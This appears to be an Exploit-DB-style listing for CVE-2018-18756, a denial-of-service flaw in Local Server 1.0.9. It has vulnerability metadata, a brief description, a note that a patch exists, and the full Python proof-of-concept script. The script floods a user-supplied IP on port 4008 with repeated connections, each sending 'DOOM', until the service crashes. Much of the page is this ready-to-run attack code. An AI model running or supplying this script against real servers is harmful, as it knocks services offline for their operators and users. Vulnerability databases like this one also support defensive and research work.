header-logo
Suggest Exploit
vendor:
Local Server
by:
Ihsan Sencan
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Local Server
Affected Version From: 1.0.9
Affected Version To: 1.0.9
Patch Exists: Yes
Related CWE: CVE-2018-18756
CPE: a:ujang_rohidin:local_server
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018

Local Server 1.0.9 – Denial of Service (PoC)

Local Server 1.0.9 is vulnerable to a denial of service attack. An attacker can send a specially crafted 'DOOM' packet to the server, causing it to crash. This can be exploited by an attacker to cause a denial of service condition.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the software.
Source

Exploit-DB raw data:

# Exploit Title: Local Server 1.0.9 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.ujang-rohidin.blogspot.com/
# Software Link: https://sourceforge.net/projects/local-server/files/latest/download
# Version: 1.0.9
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18756

# POC: 
# 1)

#!/usr/bin/python
import socket

print """
         \\\|///
       \\  - -  //
        (  @ @ )
 ----oOOo--(_)-oOOo----
 Local Server 1.0.9 Dos
	  Ihsan Sencan
 ---------------Ooooo----
                (   )
       ooooO     ) /
       (   )    (_/
        \ (
         \_)
"""
Ip = raw_input("[Ip]: ")
Port = 4008 # Default port
 
d=[]
c=0
while 1:
    try:
        d.append(socket.create_connection((Ip,Port)))
        d[c].send("DOOM")
        print "Sie!"
        c+=1
    except socket.error: 
        print "+ Done! +"
        raw_input()
        break